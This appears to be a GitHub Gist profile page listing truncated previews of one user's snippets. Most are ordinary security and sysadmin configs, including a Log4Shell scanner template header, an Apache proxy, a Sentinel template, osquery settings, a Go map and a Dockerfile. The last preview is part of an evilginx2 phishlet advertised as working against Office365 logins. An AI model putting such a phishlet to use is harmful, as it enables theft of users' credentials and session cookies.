Niels Hofmans hazcod

{
  "definition": {
    "$schema": "https://schema.management.azure.com/providers/Microsoft.Logic/schemas/2016-06-01/workflowdefinition.json#",
    "actions": {
      "Condition": {
        "actions": {
          "Terminate": {
            "inputs": {
              "runStatus": "Cancelled"
            },
hazcod / CVE-2021-44228.nuclei.yaml
Last active December 18, 2023 06:50
Nuclei template to scan for log4shell (CVE-2021-44228).
id: CVE-2021-44228
info:
  name: Log4J RCE
  author: iNvist / hazcod
  severity: critical
  description: CVE-2021-44228
requests:
  - raw:
hazcod / apache-plex-reverse-proxy.vhost
Last active December 9, 2023 19:02
Apache2 reverse proxy vhost configuration for Plex. Requires modules ssl, proxy, wstunnel
This current configuration is based on at least Server Version 1.16.5.1488 and Web Version: 3.108.2.
This updated config file allows the playing of trailers and TV Show theme music, whereas the previous one did not.
## Requirements
1. Apache version > 2.4
2. A bunch of mods enabled (proxy, ssl, proxy_wstunnel, http, dir, env, headers, proxy_balancer, proxy_http, rewrite)
3. Protocols h2 http/1.1 needs apachectl -V 2.4.17 and higher...
## Apache .conf file
hazcod / ms-sentinel-dcr-template.yml
Created November 29, 2023 10:11
Microsoft Sentinel resource template for creating a Data Collection Rule (DCR) to ingest custom logs into Microsoft Sentinel SIEM.
{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "parameters": {
    "dataCollectionRules_OnePasswordLogs_name": {
      "defaultValue": "OnePasswordLogs",
      "type": "String"
    },
    "dataCollectionEndpoints_1password_externalid": {
      "defaultValue": "/subscriptions/SUBSCRIPTION-ID-HERE/resourceGroups/myresgroup/providers/Microsoft.OperationalInsights/dataCollectionEndpoints/1password",
hazcod / Nohup with zsh on Synology DSM.md
Last active October 28, 2023 22:39
How to run scripts in the background.
  • Install the ZSH shell from SynoCommunity packages
  • Connect to your Synology over SSH
  • Switch over to your new ZSH shell: `zsh`
  • Set the following parameter to allow detaching of our shell: `setopt NO_HUP`
  • Run your command using nohup and an ampersand: `nohup <command> &`
  • Detach using CTRL+D or likewise
#!/usr/bin/env bash
CLIENT_ID="_FALCON_API_CLIENT_ID_"
CLIENT_SECRET="FALCON_API_CLIENT_SECRET_"
CID="_FALCON_CID_"
TOKEN="_FALCON_INSTALL_TOKEN"
API_HOST="api.eu-1.crowdstrike.com"
function main() {
hazcod / osquery-queries.json
Created June 16, 2020 19:35
osquery queries extracted from kolide.
{
  "options": {
    "disable_audit": false,
    "disable_events": false,
    "enable_mouse_events": false,
    "enable_keyboard_events": false,
    "events_max": 10000,
    "events_expiry": 3600,
    "read_max": 52428800,
    "logger_event_type": false,
hazcod / ttlmap.go
Created September 15, 2020 09:44
Go sync.Map with TTL and per-second scavenging
type TTLMap struct {
	TTL  time.Duration
	data sync.Map
}
type expireEntry struct {
	ExpiresAt time.Time
	Value     interface{}
}
hazcod / go-alpine-protobuf.Dockerfile
Last active August 5, 2022 16:52
Use protobuf on golang alpine Docker image.
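FROM golang:alpine
# Current Go toolchains no longer install binaries with `go get`; use `go install` with a version.
# google.golang.org/protobuf is the successor module to github.com/golang/protobuf.
RUN apk add --no-cache protobuf git \
    && go install google.golang.org/protobuf/cmd/protoc-gen-go@latest \
    && cp /go/bin/protoc-gen-go /usr/bin/
# e.g. find proto -type f -iname '*.proto' -exec protoc -I proto/ --go_out go/ {} \;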
hazcod / evilnginx-o365-phishlet.yml
Last active July 20, 2022 07:45
Working Office365 phishlet for evilnginx2.
author: '@hazcod'
min_ver: '2.3.0'
proxy_hosts:
- {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
- {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false}
sub_filters:
- {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}